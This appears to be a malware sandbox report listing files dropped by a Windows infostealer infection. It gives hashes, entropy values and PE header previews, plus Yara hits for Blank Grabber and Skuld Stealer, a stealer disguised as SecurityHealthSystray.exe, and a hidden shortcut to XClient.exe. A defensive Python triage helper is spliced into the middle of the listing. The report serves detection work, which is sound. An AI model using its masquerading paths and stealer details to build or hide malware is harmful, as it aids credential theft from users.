                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):456
                                                                                                                                                                                                                                Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26384
                                                                                                                                                                                                                                Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                                MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                                SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                                SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                                SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):659216
                                                                                                                                                                                                                                Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):267024
                                                                                                                                                                                                                                Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
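The records in this listing carry an "Entropy (8bit)" value, an "Encrypted" flag, Yara hits and a header preview for each dropped file. What follows is an added Python triage helper, not part of the Joe Sandbox report or its tooling: it parses the report's Key:Value records, recomputes the 8-bit Shannon entropy the sandbox reports (for the 60-byte AppLocker probe above, the content "# PowerShell test file to determine AppLocker lockdown mode" followed by one trailing space is the 60-byte file that reproduces the listed 4.0389 bits/byte), and ranks entries by review heuristics. The listing embedded in the script is a constructed excerpt of three records from this page trimmed to the fields used; the 7.9 entropy cutoff and the "UPX in preview" check are the example's own assumptions, not the sandbox's logic (the report itself marks 7.983 as Encrypted:false and 7.993 as Encrypted:true).

```python
"""Added triage helper for a Joe Sandbox 'dropped files' listing (example code,
not part of the report or the sandbox). Parses Key:Value records, recomputes the
'Entropy (8bit)' figure, and lists reasons an analyst should open an entry first."""
import math
from collections import Counter

# The 60-byte file PowerShell writes to probe AppLocker script policy; the trailing
# space is what gives the size (60) and entropy (4.0389...) shown in the report.
APPLOCKER_TEST_BYTES = b"# PowerShell test file to determine AppLocker lockdown mode "

# Constructed excerpt: three records copied from the listing, shortened to the
# fields used here (previews trimmed but UPX section names kept).
SAMPLE_LISTING = r"""
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:ASCII text
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI44642\rarreg.key, Author: Joe Security
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Size (bytes):659216
Entropy (8bit):7.993010988331354
Encrypted:true
SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......This program cannot be run in DOS mode....PE..d.....UPX0....UPX1....rsrc....4.02.UPX!.$..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""

PACKED_ENTROPY = 7.9  # assumption: near-maximal entropy means a packed/encrypted payload


def shannon_entropy_8bit(data: bytes) -> float:
    """Bits per byte over the byte histogram, i.e. the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_matches_report(data: bytes, reported: float, tol: float = 1e-9) -> bool:
    """True if the file bytes reproduce the entropy the report lists for them."""
    return abs(shannon_entropy_8bit(data) - reported) <= tol


def parse_records(text: str) -> list[dict]:
    """One dict per dropped file; a record starts at each 'Process:' line and
    bullet lines ('• ...') are collected under the Antivirus / Yara Hits section."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            cur = {"Antivirus": [], "Yara Hits": []}
            records.append(cur)
        if cur is None:
            continue
        if line.startswith("•"):
            if section is not None:
                cur[section].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")  # first colon only: paths keep 'C:\'
        key = key.strip()
        if key in ("Antivirus", "Yara Hits"):
            section = key
        else:
            section = None
            cur[key] = value.strip()
    return records


def triage_reasons(rec: dict) -> list[str]:
    """Review heuristics for one record (thresholds are this example's assumptions)."""
    reasons = []
    if rec.get("Malicious") == "true":
        reasons.append("report flags as malicious")
    for hit in rec["Yara Hits"]:
        reasons.append("yara: " + hit.split(",")[0].removeprefix("Rule:").strip())
    if "UPX" in rec.get("Preview", ""):
        reasons.append("UPX section names in PE header")
    entropy = float(rec.get("Entropy (8bit)", "0"))
    if entropy >= PACKED_ENTROPY:
        reasons.append(f"entropy {entropy:.3f} >= {PACKED_ENTROPY}")
    return reasons


def triage_listing(text: str) -> dict[str, list[str]]:
    """Map each record's SHA-256 to its reasons, entries with most reasons first."""
    out = {rec["SHA-256"]: triage_reasons(rec) for rec in parse_records(text)}
    return dict(sorted(out.items(), key=lambda kv: -len(kv[1])))


if __name__ == "__main__":
    print(f"AppLocker probe entropy: {shannon_entropy_8bit(APPLOCKER_TEST_BYTES):.6f}")
    for sha, reasons in triage_listing(SAMPLE_LISTING).items():
        print(sha[:16], reasons or ["nothing notable"])
```

Feed the script the full dropped-files listing (saved as text) instead of SAMPLE_LISTING to rank all entries; a near-8.0 entropy on a PE that AV does not flag, as with the UPX-packed DLLs above, is the usual sign that the detectable content only appears after unpacking.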
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Roaming\skuld.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):10375680
Entropy (8bit):6.306827139596188
Encrypted:false
SSDEEP:98304:OhoRYXiOhqugpWWNeWTQLc4u0u08eOEaB2v/ZmMz/:ao3OhqFHIrLc4uB08erlNz/
MD5:DBBD2127D1030E4C9548FDF7DE9983A7
SHA1:5B7939A94CBD908AD8F57BB2E5328CCE657C3700
SHA-256:8E3601302C0294914808B6537CD27DE961D087BA0807590B981B7F8C8AA5EEE6
SHA-512:95A1112C9B062745DF9C20F566CFCB9421221111D02DB0C1A940A5EA230B09C39A487685AE674C350E4641132E3360A19CA0CD8762F7E46CECDE8B7DD85FE5D2
Malicious:true
Yara Hits:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
• Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........P........"......@M..R......@H........@...........................................`... .................................................>...............0....................................................................7..x............................text...t>M......@M................. ..`.rdata....F..PM...F..FM.............@..@.data...`{...0...R...&..............@....pdata..0............x..............@..@.xdata.......p.......6..............@..@.idata..>............8..............@....reloc...............>..............@..B.symtab..............P.................B................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\eternal.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 17 09:21:22 2024, mtime=Sun Nov 17 09:21:22 2024, atime=Sun Nov 17 09:21:22 2024, length=71168, window=hide
Category:dropped
Size (bytes):765
Entropy (8bit):5.103999643702136
Encrypted:false
SSDEEP:12:8oD24pkCh3yY//HDdlLEvj8JfYjA1HkZYiY+mV:8o/6OzEvjRA6ZYiY+m
MD5:6CFDC2FC41B337A776CC91FA001CF1C1
SHA1:3C7D5757F751929A402E4D2C1A7778802EDEA0F3
SHA-256:C0F431FC1EE51CEBC60A6195A0968A2B7EC4AA47AED2776A641FCE263DA61F99
SHA-512:5474B28C67B58826605048F8D8D5BB7DCE61AA42D613AE160B9721274FB78650FBBB1E2297F89E37217974C5DB9562D58938B09B3588BE3B9F525789CA61A0C1
Malicious:false
Reputation:unknown
Preview:L..................F.... .....r.8....r.8....r.8..........................v.:..DG..Yr?.D..U..k0.&...&.......y.Yd....].f.8..D1Ts.8......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BqY.R..........................d...A.p.p.D.a.t.a...B.V.1.....qY.R..Roaming.@......EW)BqY.R...........................)..R.o.a.m.i.n.g.....b.2.....qY.R .XClient.exe.H......qY.RqY.R.....*......................(.X.C.l.i.e.n.t...e.x.e.......Z...............-.......Y.............+j.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......971342...........hT..CrF.f4... .I..Yc...,...E...hT..CrF.f4... .I..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Users\user\AppData\Roaming\eternal.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):71168
Entropy (8bit):6.026372989128195
Encrypted:false
SSDEEP:1536:dEmkVu+xslqytUTZfJM6htYxrlYCbM1/kCxtD6LOSIcRGPUC:dEZZx8q/fJLtYFZbM1segO3cQ8C
MD5:7439CC991A9A756C41153B8E9121BAAB
SHA1:C62528386E5F62FF2975CC8ED0CAD3A7D362E632
SHA-256:31A2B821E933BB193D94438D4A5AA036519535336C936D65B66889FB03164E2D
SHA-512:CBDFD77671884407F8F4BD9C5251DF5D8896B29BD004EA52460EDA8A222DF7492C69572E044376315624220F3EA66DE3AFF34323EA281591CA2975F90FA6DD51
Malicious:true
Yara Hits:
